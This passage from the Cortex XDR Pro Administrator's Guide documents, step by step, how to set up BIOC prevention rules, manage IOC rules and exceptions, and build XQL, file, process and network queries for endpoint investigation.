disables BIOC rules that reach 5000 or more hits over a 24 hour period.

STEP 3 | Right-click and select Add to restrictions profile.

If the rule is already referenced by one or more profiles, select See profiles to view the profile names.

STEP 4 | In the Add to Restrictions Profile pop-up:

• Ensure the rule you selected is compatible with the type of endpoint operating system.
• Select the Restriction Profile name you want to apply the BIOC rule to for each of the operating
systems. BIOC event rules of type Event Log and Registry are only supported by Windows OS.

You can only add to existing profiles you created, Cortex XDR Default profiles will not
appear as an option.

STEP 5 | Add the BIOC rule to the selected profiles.

The BIOC rule is now configured as a custom prevention rule and applied to your Restriction profiles.
After the Restriction profile is pushed to your endpoints, the custom prevention rule can start triggering
behavioral prevention type alerts.

STEP 6 | Review and edit your custom prevention rules.

1. Navigate to Endpoints > Policy Management > Profiles.
2. Locate the Restrictions Profile to which you applied the BIOC rule. In the Summary field, Custom
Prevention Rules appears as Enabled.

180 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 3. Right-click and select Edit.
4. In the Custom Prevention Rules section, you can review and modify the following:
• Action Mode—Select to Enable or Disable the BIOC prevention rules.
• Auto-disable—Select if to auto-disable a BIOC prevention rule if it triggers after a defined number
of times during a defined duration.

Auto-disable will turn off both the BIOC rule detection and the BIOC prevention
rule.
• Prevention BIOC Rules table—Filter and maintain the BIOC rules applied to this specific
Restriction Profile. Right-click to Delete a rule or Go to BIOC Rules table.
5. Save your changes if necessary.
6. Investigate the BIOC prevention rules alerts.
•
Navigate to > Investigation > Incidents > Alerts Table.
• Filter the fields as follows:
• Alert Source: XDR Agent
• Action: Prevention (<profile action mode>)
• Alert Name: Behavioral Threat
• In the Description field you can see the rule name that raised the prevention alert.

Import Rules
You can use the import feature of Cortex XDR to import BIOCs from external feeds or that you previously
exported. The export/import capability is useful for rapid copying of BIOCs across different Cortex XDR
instances.

You can only import files that were exported from Cortex XDR. You can not edit an exported
file.

STEP 1 | From Cortex XDR, select Rules > BIOC.

STEP 2 | Select Import Rules.

STEP 3 | Drag and drop the file on the import rules dialog or browse to a file.

STEP 4 | Click Import.

Cortex XDR loads any BIOC rules. This process may take a few minutes depending on the size of the file.

STEP 5 | Refresh the BIOC Rules page to view matches (# of Hits) in your historical data.

STEP 6 | To investigate any matches, view the Alerts page and filter the Alert Name by the name of the
BIOC rule.

Manage Global BIOC Rules

Cortex XDR checks for the latest update of global BIOC rules. If there are no new global BIOC rules, the
app displays a content status of Content up to date next to the BIOC rules table heading. A dot to the
left of the rule name indicates a global BIOC rule. You can also view the optional Source field to see which
rules are pushed by Palo Alto Networks.
• Get the latest global BIOC rules.
• Copy a global BIOC rule.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 181

© 2020 Palo Alto Networks, Inc.
 • Add a Rule Exception.

• Get the latest global BIOC rules.

1. Navigate to Rules > BIOC.
2. To view the content details, hover over the status to show the global rules version number and last
check date.

The content status displays the date when the content was last updated, either automatically or
manually by an administrator.

3. If the status displays Could not check update, click the status to check for updates manually.
The last updated date changes when the download is successful.

• Copy a global BIOC rule.

You cannot directly modify a global rule, but you can copy global rules as a template to create new rules.
1. Locate a Palo Alto Networks Source type rule, right-click and select Save as New.
2. Review and modify the BIOC properties as needed.
3. Select OK to save the rule.
The rule appears in the BIOC Rules table as a user-defined Source type rule which you can edit.

• Add a Rule Exception.

Although you cannot edit global rules, you can add exceptions to the rule, if needed.

Working with IOCs

IOCs provide the ability to alert on known malicious objects on endpoints across the organization. You can
load IOC lists from various threat-intelligence sources into the Cortex XDR app or define them individually.

Cortex XDR supports a maximum of 4,000,000 IOCs.

182 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 You can define the following types of IOCs:
• Full path
• File name
• Domain
• Destination IP address
• MD5 hash
• SHA256 hash
After you define or load IOCs, the app checks for matches in the endpoint data collected from Cortex XDR
agents. Checks are both retroactive and ongoing: The app looks for IOC matches in all data collected in the
past and continues to evaluate new any new data it receives in the future.
Alerts for IOCs are identified by a source type of IOC (see Cortex XDR Alerts for more information).
• IOC Rule Details
• Create an IOC Rule
• Manage Existing Indicators

IOC Rule Details

From the Rules > IOC page, you can view all indicators of compromise (IOCs) configured from or uploaded
to the Cortex XDR app. To filter the number of IOC rules you see, you can create filter by one or more
fields in the IOC rules table. From the IOC page, you can also manage or clone existing rules.

The following table describes the fields that are available for each IOC rule in alphabetical order.

Field Description

# OF HITS The number of hits (matches) on this indicator.

CLASS The IOC's class. For example, 'Malware'.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 183

© 2020 Palo Alto Networks, Inc.
 Field Description

COMMENT Free-form comments specified when the IOC was created or modified.

EXPIRATION DATE The date and time at which the IOC will be removed automatically.

INDICATOR The indicator value itself. For example, if the indicator type is a
destination IP address, this could be an IP address such as 1.1.1.1.

INSERTION DATE Date and time when the IOC was created.

MODIFICATION DATE Date and time when the IOC was last modified.

RELIABILITY Indicator's reliability level:

• A - Completely Reliable
• B - Usually Reliable
• C - Fairly Reliable
• D - Not Usually Reliable
• E - Unreliable

REPUTATION Indicator's reputation level. One of Unknown, Good, Bad, or Suspicious.

RULE ID Unique identification number for the rule.

SEVERITY IOC severity that was defined when the IOC was created.

SOURCE User who created this IOC, or the file name from which it was created,
or one of the following keywords:
• Public API—the indicator was uploaded using the Insert Simple
Indicators, CSV or Insert Simple Indicators, JSON REST APIs.
• XSOAR TIM—the indicator was retrieved from XSOAR.

STATUS Rule status: Enabled or Disabled.

TYPE Type of indicator: Full path, File name, Host name, Destination IP, MD5
hash.

VENDORS A list of threat intelligence vendors from which this IOC was obtained.

Create an IOC Rule

There are two options for creating new IOC rules:
• Configure a single IOC.
• Upload a file, one IOC per line, that contains up to 20,000 IOCs. For example, you can upload multiple
file paths and MD5 hashes for an IOC rule. To help you format the upload file in the syntax that Cortex
XDR will accept, you can download the example file.
If you have a Cortex XDR Pro per Endpoint license, you can upload IOCs using REST APIs in either CSV
or JSON format.

184 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 To ensure your IOC rules raise alerts efficiently and do not overcrowd your Alerts table,
Cortex XDR automatically:
• Disables any IOC rules that reach 5000 or more hits over a 24 hour period.
• Creates a Rule Exception based on the PROCESS SHA256 field for IOC rules that hit
more than 100 endpoints over a 72 hour period.

STEP 1 | From Cortex XDR, select Rules > IOC.

STEP 2 | Select + Add IOC.

STEP 3 | Configure the IOC criteria.

If after investigating a threat, you identify a malicious artifact, you can create an alert for the Single IOC
right away.
1. Configure the INDICATOR value on which you want to match.
2. Configure the IOC TYPE. Options are Full Path, File Name, Domain, Destination IP, and MD5 or
SHA256 Hash.
3. Configure the SEVERITY you want to associate with an alert for the IOC: Informational, Low,
Medium, or High.
4. (Optional) Enter a comment that describes the IOC.
5. (Optional) Configure the IOC's REPUTATION.
6. (Optional) Configure the IOC's RELIABILITY.
7. (Optional) Enter an EXPIRATION for the IOC. Options are Default, Specific Expiration Date, No
Expiration.
8. Click Create.
If you want to match on multiple indicators, you can upload the criteria in a CSV file.
1. Select Upload File.
2. Drag and drop the CSV file containing the IOC criteria in the drop area of the Upload File dialog or
browse to the file.
Cortex XDR supports a file with multiple IOCs in a pre-configured format. For help determining the
format syntax, Cortex XDR provides an example text file that you can download.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 185

© 2020 Palo Alto Networks, Inc.
 3.
4. Configure the SEVERITY you want to associate with an alert for the IOCs: Informational, Low,
Medium, or High.
5. Define the DATA FORMAT of the IOCs in the CSV file. Options are Mixed, Full Path, File Name,
Domain, Destination IP, and MD5 or SHA256 Hash.
6. (Optional) Configure the IOC's REPUTATION.
7. (Optional) Configure the IOC's RELIABILITY.
8. (Optional) Enter an EXPIRATION for the IOC. Options are Default, Specific Expiration Date, No
Expiration.
9. Click Upload.

STEP 4 | (Optional) Define any expiration criteria for your IOC rules.
If desired, you can also configure additional expiration criteria per IOC type to apply to all IOC rules. In
most cases, IOC types like Destination IP or Host Name are considered malicious only for a short period
of time since they are soon cleaned and then used by legitimate services, from which time they only
cause false positives. For these types of IOCs, you can set a defined expiration period. The expiration
criteria you define for an IOC type will apply to all existing rules and additional rules that you create in
the future. By default, Cortex XDR does not apply an expiration date set on IOCs.
1. Select Default Rule Expiration.
2. Set the expiration for any relevant IOC type. Options are Never, 1 week, 1 month, 3 months, or 6
months.
3. Click Save.

Manage Existing Indicators

After you create an indicator rule, you can take the following actions:

For Analytics BIOC rules, you can only disable and enable rules.

• View Alerts Triggered by a Rule

• Use a BIOC Rule as the Basis of a Query
• Edit a Rule
• Export a Rule (BIOC Only)
• Copy a Rule
• Disable or Remove a Rule
• Add a Rule Exception
• Export a Rule Exception

View Alerts Triggered by a Rule

As your IOC and BIOC rules trigger alerts, Cortex XDR displays the total # OF HITS for the rule in the on
the BIOC or IOC rules page. For rules with a high, medium, or low severity that have raised one or more
alerts, you can quickly pivot to a filtered view of those alerts raised by the indicator:

STEP 1 | Select RULES and the type of rule (BIOC or IOC).

STEP 2 | Right-click anywhere in a rule, and then select View associated alerts.
Cortex XDR displays a filtered query of alerts associated with the Rule ID.

186 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Use a BIOC Rule as the Basis of a Query
STEP 1 | Select RULES and the type of rule (BIOC or IOC).

STEP 2 | Right-click anywhere in the rule, and then select Open in query builder.
Cortex XDR populates a query using the criteria of the BIOC rule.

STEP 3 | If desired, add or change the query criteria.

STEP 4 | (Optional) Test your query to see the sample results.

STEP 5 | If you are satisfied with query, Save the query.

For more information, see Manage Your Queries.

Edit a Rule
After you create a rule, it may be necessary to tweak or change the rule settings. You can open the rule
configuration from the Rules page or from the pivot menu of an alert triggered by the rule. To edit the rule
from the Rules page:

STEP 1 | Select RULES and the type of rule (BIOC or IOC).

STEP 2 | Locate the rule you want to edit.

STEP 3 | Right click anywhere in the rule and select Edit.

STEP 4 | Edit the rule settings as needed, and then click OK.
If you make any changes, Test and then Save the rule.

Export a Rule (BIOC Only)

STEP 1 | Select RULES > BIOC.

STEP 2 | Select the rules that you want to export.

STEP 3 | Right click any of the rows, and select Export selected.
The exported file is not editable, however you can use it as a source to import rules at a later date.

Copy a Rule
You can use an existing rule as a template to create a new one. Global BIOC rules cannot be deleted or
altered, but you can copy a global rule and edit the copy. See Manage Global BIOC Rules.

STEP 1 | Select RULES and the type of rule (BIOC or IOC).

STEP 2 | Locate the rule you want to copy.

STEP 3 | Right click anywhere in the rule row and then select Copy to create a duplicate rule.

Disable or Remove a Rule

If you no longer need a rule you can temporarily disable or permanently remove it.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 187

© 2020 Palo Alto Networks, Inc.
 You cannot delete global BIOCs delivered with content updates.

STEP 1 | Select RULES and the type of rule ( BIOC or IOC).

STEP 2 | Locate the rule that you want to change.

STEP 3 | Right click anywhere in the rule row and then select Remove to permanently delete the rule, or
Disable to temporarily stop the rule. If you disable a rule you can later return to the rule page
to Enable it.

Add a Rule Exception

If you want to create a rule to take action on specific behaviors but also want to exclude one or more
indicators from the rule, you can create a rule exception. An indicator can include the SHA256 hash of a
process, process name, process path, vendor name, user name, causality group owner (CGO) full path, or
process command-line arguments. For more information about these indicators, see Cortex XDR Indicators.
For each exception, you also specify the rule scope to which exception applies.

Cortex XDR only supports exceptions with one attribute. See Add an Alert Exclusion Policy to
create advanced exceptions based on your filtered criteria.

STEP 1 | From Cortex XDR, select Rules > Rule Exceptions.

STEP 2 | Select + New Exception.

STEP 3 | Configure the indicators and conditions for which you want to set the exception.

STEP 4 | Choose the scope of the exception, whether the exception applies to IOCs, BIOCs, or both.

STEP 5 | Save the exception.

By default, activity matching the indicators does not trigger any rule. As an alternative, you can select
one or more rules. After you save the exception, the Exceptions count for the rule increments. If you
later edit the rule, you will also see the exception defined in the rule summary.

Export A Rule Exception

You can choose to export a BIOC rule exception.

STEP 1 | From Cortex XDR, select Rules > Rule Exceptions.

STEP 2 | In the Exceptions table, locate the exception rule you want to export. You can select multiple
rules.

STEP 3 | Right-click and select Export.

If one or more of the selected exceptions are applied to a specific BIOC rule, select one of the following
options:
• Export anyway
• Export only non-specific Exceptions—Only export exceptions applied on all BIOC rules.
• Export all Exceptions as non-specific—Export and apply specific Exceptions to BIOC rules.

188 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Search Queries
• Cortex XDR Query Builder
• Cortex XDR Query Center
• Cortex XDR Scheduled Queries
• Quick Launcher
• Research a Known Threat

Cortex XDR Query Builder

The Query Builder is a powerful search tool at the heart of Cortex XDR that you can use to investigate any
lead quickly, expose the root cause of an alert, perform damage assessment, and hunt for threats from your
data sources. With Query Builder, you can build complex queries for entities and entity attributes so that
you can surface and identify connections between them. The Query Builder searches the raw data and logs
stored in Cortex Data Lake and Cortex XDR for the entities and attributes you specify and returns up to
100,000 results.
From the Query Builder, you can also use the XQL Search to create XQL queries to search for and view raw
data that is stored in Cortex XDR or imported from custom and third-party datasets.

The Query Builder provides queries for the following types of entities:
• Process—Search on process execution and injection by process name, hash, path, command-line
arguments, and more. See Create a Process Query.
• File—Search on file creation and modification activity by file name and path. See Create a File Query.
• Network—Search network activity by IP address, port, host name, protocol, and more. See Create a
Network Query.
• Registry—Search on registry creation and modification activity by key, key value, path, and data. See
Create a Registry Query.
• Event Log—Search Windows event logs by username, log event ID, log level, and message. See Create an
Event Log Query.
• Network Connections—Search security event logs by firewall logs, endpoint raw data over your
network. See Create a Network Connections Query.
• All Actions—Search across all network, registry, file, and process activity by endpoint or process. See
Query Across All Entities.
The Query Builder also provides flexibility for both on-demand query generation and scheduled queries.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 189

© 2020 Palo Alto Networks, Inc.
XQL Search
The XDR Query Language (XQL) enables you to query data ingested into Cortex XDR for rigorous endpoint
and network event analysis. XQL forms queries in stages. Each stage performs a specific query operation
and is delimited by a pipe (|). Queries require a dataset, or data source, to run against. Unless otherwise
specified, the query will run against the xdr_data dataset, which contains all log information that Cortex
XDR collects. However, you can also configure Cortex XDR to query additional datasets.
It is possible to create a dataset with uppercase characters in its name, but when creating a query, the
dataset name only uses lowercase characters.
To streamline your investigations, the XQL search provides the following aids to help you construct and
visualize your queries.

• XQL query—The XQL query field is where you define the parameters of your query. To help you create
an effective XQL query, the search field provides suggestions and definitions as you type.
• Query Results—After you create and run an XQL query, you can view, filter, and visualize your Query
Results.
• XQL Helper—Describes common stage commands and provides of examples that you can use to build a
query.
• Query Library—Contains common, predefined queries that you can use or modify to your liking.
• Schema—Contains schema information for every field found in the result set. This information includes
the field name, data type, descriptive text (if available), and the dataset that contains the field. In order
for a field to appear in the Schema tab, it must contain a non-NULL value at least once in the result set.
For further help constructing queries, use the Cortex XDR XQL Language Reference.
Create an XQL Query
Use XQL Search to analyze raw log data stored in Cortex XDR. The following example demonstrates how
to create a query that uses the coalesce function to derive a single username by examining multiple field
names.
The XQL Language Reference provides more information about valid commands, such as the ones used in
this example, and general XQL syntax.

STEP 1 | From Cortex XDR, select Investigation > Query Builder > XQL Search.

STEP 2 | (Optional) Specify a dataset.

You only need to specify a dataset if you are running your query against a dataset that you have not set
as default. For more information, see how to manage datasets. See the XQL Language Reference for a
list of the datasets that are available to you, depending on your configuration.
From the first letter that you type, the query field provides you with suggestions of commands and their
definitions:

190 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 When you select a command, you will see available operators:

After selecting the operator, the query field presents available values:

STEP 3 | Hit the return key and enter a pipe (|) followed by the first stage of your query.

This stage uses the fields command to declare which fields are returned in the results. If you use this
stage, then following stages can only operate on the fields specified in it.

STEP 4 | Continue adding stages until your query is complete.

This stage uses the function coalesce to return the first value that is not NULL out of the given fields
and the alter stage command to assign that value to the field username.

STEP 5 | Specify the time period against which you want to run your query.
The options are last 24H (hours), last 7D (days), last 1M (month), or select a Custom time period.

STEP 6 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Add as BIOC to save the
query as a BIOC rule (if compatible), Run in background (that is, as resources are available), or Run the
query immediately.

STEP 7 | After running your query, review the Query Results.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 191

© 2020 Palo Alto Networks, Inc.
 Alternate between the following display options to investigate your query results:
• Table ( )—Displays results in rows and columns according to the entity fields.

From the menu, you can change the table layout. You can also change the raw log format
(displayed in the _Raw_Log field) to one of the following log formats:
• RAW—Raw format of the entity in the database.
• JSON—Condensed JSON format with key value distinctions. Null values are not displayed.
• TREE—Dynamic view of the JSON hierarchy with the option to collapse and expand the different
hierarchies.
• Graph ( )—Use the Chart Editor to visualize the query results.
• Advanced ( )—Displays results in a table format aggregating the entity fields into one column.

Similar to the table display, you can change the layout and log format from the menu.
Select Show more to pivot an Expanded View of the event results that include null values. You can
toggle between the JSON and Tree views, search, and Copy to clipboard.
For Table and Advanced displays, Cortex XDR provides a Fields menu on the left side of the query
results that you use to filter the results. To quickly set a filter, Cortex XDR displays the top 10 results
from which you can choose to build your filter. From within the Fields menu, click on any field (excluding
JSON and array fields) to see a histogram of all the values found in the result set for that field. This
histogram includes a count of the total number of times a value was found in the result set, the value's
frequency as a percentage of the total number of values found for the field, and a bar chart showing the
value's frequency. In order for Cortex XDR to provide a histogram for a field, the field must not contain
an array or a JSON object.

192 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 You can also manage your queries, which includes viewing query results, from the Query Center.

STEP 8 | If desired, continue investigation in the Causality View or Timeline View.

Right-click the event and select the desired view. This option is available for the following types of
events: process (except for those with an event sub type of termination), network, file, registry, injection,
load image, system calls, and Windows event logs. For network stories, you can pivot to the Causality
View only.

STEP 9 | (Optional) Visualize your query results.

Manage Datasets
Cortex XDR runs every XQL query against a dataset. A dataset is a CSV or JSON file that contains the data
you are interested in querying. If you do not specify a dataset in your query, then Cortex XDR runs the
query against the xdr_data dataset, which contains all of the endpoint and network data that Cortex XDR
collects.
To query other datasets, you have two options: you can either set the dataset as default, which enables
you to query the datasets without specifying them in the query, or you can name a specific dataset at the
beginning of your query with the dataset stage command. You can add to your list of available datasets by
uploading a CSV or JSON file to Cortex XDR.

You cannot upload a file that contains a byte array (that is, binary data).

Manage datasets from Cortex XDR > Settings ( ) > Dataset Management. There, you can import, view, and
interact with your available datasets.
In addition to the names of your datasets, you can view their Type and whether or not they are the Default
Query Target. Cortex XDR determines Type by the method used to upload the dataset. If uploaded through
the user interface, the Type is Lookup. If saved by a query using the target command, the Type can be
either User or Lookup. See the entry for target in the XQL Language Reference for details.

• Import a dataset.
1. Select + Lookup.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 193

© 2020 Palo Alto Networks, Inc.
 2. Browse to your CSV or JSON file, or drag and drop it into the dialog window.

When uploading a JSON file, ensure that each Field name meets the following
requirements:
• Only use letters (a-z, A-Z), numbers (0-9), or underscores (_).
You can create dataset names using uppercase characters, but in queries dataset
names are always treated as if they are lowercase.
• Must start with a letter or underscore. Cannot use prefixes TABLE, FILE, or
_PARTITION.
• Cannot exceed 128 characters.
• No duplicate names, white spaces, or carriage returns.
3. (Optional) Rename the file.
4. Add the file as a lookup.

5. After receiving a notification reporting that the upload succeeded, Refresh ( ) to view it in your list
of datasets.
If the file has the same name as an existing dataset, Cortex XDR will append an underscore and a
number to the name to make it unique.

• Save query results as a dataset.

You can use the target stage command to save query results as a dataset. For details about this
command, see the XQL Language Reference.

• Query against a dataset by selecting it with the dataset command when you create an XQL
query.

• Right-click on a dataset to delete it, copy it, set it as default, and show or hide datasets.

194 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 • Set as default to query the dataset without having to specify it in your queries.
• Delete to remove the dataset from Cortex XDR.
• Copy text to clipboard to copy the name of the dataset to your clipboard.
• Copy entire row to copy each cell in a row, separated by tabs, to your clipboard.
• Show rows with ‘<dataset_name>’ to create a filter that displays all datasets with the same name.
• Hide rows with ‘<dataset_name>’ to create a filter that hides all datasets with the same name.

• Filter your available datasets to specify the ones you want to see.
1. Select Filter.
An interface for your filter criteria appears.

2. Select a field, an operator, and a value to match.

3. Select + AND or + OR to add additional filter expressions.

4. Save ( ) your filter to reuse it later.

After saving, select the three-dot menu ( ) to view your filter.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 195

© 2020 Palo Alto Networks, Inc.
 • Customize the table.

Select the three-dot menu ( ) and Layout to change the width of rows and columns. You can also select
which columns to display.

Visualize Query Results

To help you better understand your XQL query results and share your insights with others, Cortex XDR
enables you to generate visualizations of your query data directly from the XQL Search page.

STEP 1 | Navigate to Cortex XDR > Query Builder > XQL Search.

STEP 2 | Run an XQL query.

For example, enter dataset = xdr_data | fields action_total_upload, _time | limit
10. The query returns the action_total_upload, a number field, and _time, a string field, for up to
10 results.

STEP 3 | In the Query Results section, to visualize the results either:

1. Navigate to Query Results > Chart Editor ( ) to manually build and view the graph using the
selected visualization parameters:

• Main
• Graph Type—Type of visualization; Area, Bubble, Column, Gauge, Line, Pie, Scatter, or Single
Value.
• Subtype and Layout—Depending on the selected type of graph, choose from the available
display options.
• Header—Title your graph.

196 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 • Show Callouts—Display numeric values on graph.
• Data
• X-axis—Select a field with a string value.
• Y-axis—Select a a field with a numeric value.
• Depending on the selected type of graph, customize the Color, Font, and Legend.
2. Enter the visualization parameters in the XQL query section.
You can express any chart preferences in XQL. This is helpful when you want to save your chart
preferences in a query and generate a chart every time that you run it. To define the parameters,
either:
• Manually enter the parameters, for example, view graph type = column
subtype = grouped header = “Test 1” xaxis = _time yaxis =
_product,action_total_upload.
• Select ADD TO QUERY to insert your chart preferences into the query itself.

STEP 4 | (Optional) Create a custom widget.

To easily track your query results, you can create custom widgets based on the query results in the
Widget Library. The custom widgets you create can be used in your custom dashboards and reports.
Select Save to Widget Library to pivot to the Widget Library and generate a custom widget based on the
query results.

Create a File Query

From the Query Builder you can investigate connections between file activity and endpoints. The Query
Builder searches your logs and endpoint data for the file activity that you specify. To Search for Files on
Endpoints instead of file-related activity, use the Native Search.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 197

© 2020 Palo Alto Networks, Inc.
 Some examples of file queries you can run include:
• Files modified on specific endpoints.
• Files related to process activity that exist on specific endpoints.
To build a file query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select FILE.

STEP 3 | Enter the search criteria for the file events query.
• File activity—Select the type or types of file activity you want to search: All, Create, Read, Rename,
Delete, or Write.
• File attributes—Define any additional process attributes for which you want to search. Use a pipe (|)
to separate multiple values (for example notepad.exe|chrome.exe). By default, Cortex XDR will
return the events that match the attribute you specify. To exclude an attribute value, toggle the =
option to =!. Attributes are:
• NAME—File name.
• PATH—Path of the file.
• PREVIOUS NAME—Previous name of a file.
• PREVIOUS PATH—Previous path of the file.
• MD5—MD5 hash value of the file.
• SHA256—SHA256 hash value of the file.
• DEVICE TYPE—Type of device used to run the file: Unknown, Fixed, Removable Media, CD-ROM.
• DEVICE SERIAL NUMBER—Serial number of the device type used to run the file.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.

198 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:

• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create a Process Query

From the Query Builder you can investigate connections between processes, child processes, and
endpoints.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 199

© 2020 Palo Alto Networks, Inc.
 For example, you can create a process query to search for processes executed on a specific endpoint.
To build a process query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select PROCESS.

STEP 3 | Enter the search criteria for the process query.

• Process action—Select the type of process action you want to search: On process Execution or
Injection into another process.
• Process attributes—Define any additional process attributes for which you want to search.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
By default, Cortex XDR will return results that match the attribute you specify. To exclude an
attribute value, toggle the operator from = to !=. Attributes are:
• NAME—Name of the process. For example, notepad.exe.
• PATH—Path to the process. For example, C:\windows\system32\notepad.exe.
• CMD—Command-line used to initiate the process including any arguments, up to 128 characters.
• MD5—MD5 hash value of the process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the process: Signature Unavailable, Signed, Invalid Signature,
Unsigned, Revoked, Signature Fail.
• SIGNER—Signer of the process.
• PID—Process ID.
• DEVICE TYPE—Type of device used to run the process: Unknown, Fixed, Removable Media, CD-
ROM.
• DEVICE SERIAL NUMBER—Serial number of the device type used to run the process.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

200 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:

• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create a Network Query

From the Query Builder you can investigate connections between network activity, acting processes, and
endpoints.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 201

© 2020 Palo Alto Networks, Inc.
 Some examples of network queries you can run include:
• Network connections to or from a specific IP address and port number.
• Processes that created network connections.
• Network connections between specific endpoints.
To build a network query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select NETWORK.

STEP 3 | Enter the search criteria for the network events query.
• Network traffic type—Select the type or types of network traffic alerts you want to search: Incoming,
Outgoing, or Failed.
• Network attributes—Define any additional process attributes for which you want to search. Use a
pipe (|) to separate multiple values (for example 80|8080). By default, Cortex XDR will return the
events that match the attribute you specify. To exclude an attribute value, toggle the = option to =!.
Options are:
• REMOTE COUNTRY—Country from which the remote IP address originated.
• REMOTE IP—Remote IP address related to the communication.
• REMOTE PORT—Remote port used to make the connection.
• LOCAL IP—Local IP address related to the communication. Matches can return additional data if a
machine has more than one NIC.
• LOCAL PORT—Local port used to make the connection.
• PROTOCOL—Network transport protocol over which the traffic was sent.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.

